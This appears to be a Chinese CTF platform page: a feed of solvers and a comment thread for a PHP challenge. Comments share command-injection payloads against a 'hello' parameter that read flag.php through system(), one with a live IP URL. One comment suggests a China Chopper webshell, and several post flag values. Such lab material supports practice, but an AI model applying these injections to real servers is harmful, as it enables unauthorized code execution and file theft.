评分(9)
解题动态

testda 攻破了该题 1小时前

satuo 攻破了该题 1小时前

goeasy 攻破了该题 5小时前

867736371 攻破了该题 5小时前

废柴小白 攻破了该题 5小时前

19893123836 攻破了该题 6小时前

tcg979 攻破了该题 18小时前

AX渊仪 攻破了该题 23小时前

qwerfsafafa 攻破了该题 23小时前

太水了410410 攻破了该题 23小时前

6145 攻破了该题 1天前

zer0_h 攻破了该题 1天前

Hehe0619 攻破了该题 1天前

李嘉欣a 攻破了该题 1天前

嗨客111 攻破了该题 1天前

呆羊 攻破了该题 1天前

ahco 攻破了该题 1天前

17365797718 攻破了该题 1天前

你猜呀啊哈哈 攻破了该题 1天前

评论
liuguowang75 3月前
举报
/?hello=system('ls') /?hello=system('cat flag.php')
HK1ng 3月前
举报
这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。
Gargantua 3月前
举报
这是什么原因呢?是不是因为浏览器将php代码执行了啊
zhwen 3月前
举报
代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'
650907784qqcom 3月前
举报
flag{***}
xinchang 3月前
举报
flag{*********}
八一卜kod 4月前
举报
Too Young Too Simple
evira 5月前
举报
温馨提示(但不是正解):这个题可以尝试一下用菜刀去shell
BaiBaiWin 7月前
举报
http://114.67.175.224:16319/?hello=system('tac flag.php')
1215125613 7月前
举报
flag{1e6d67d7cec2d7d4c373db2605f5f4a1}
Wang_Micro 7月前
举报
flag{771f65b0a99e6ebb383759a6d4e34c8a}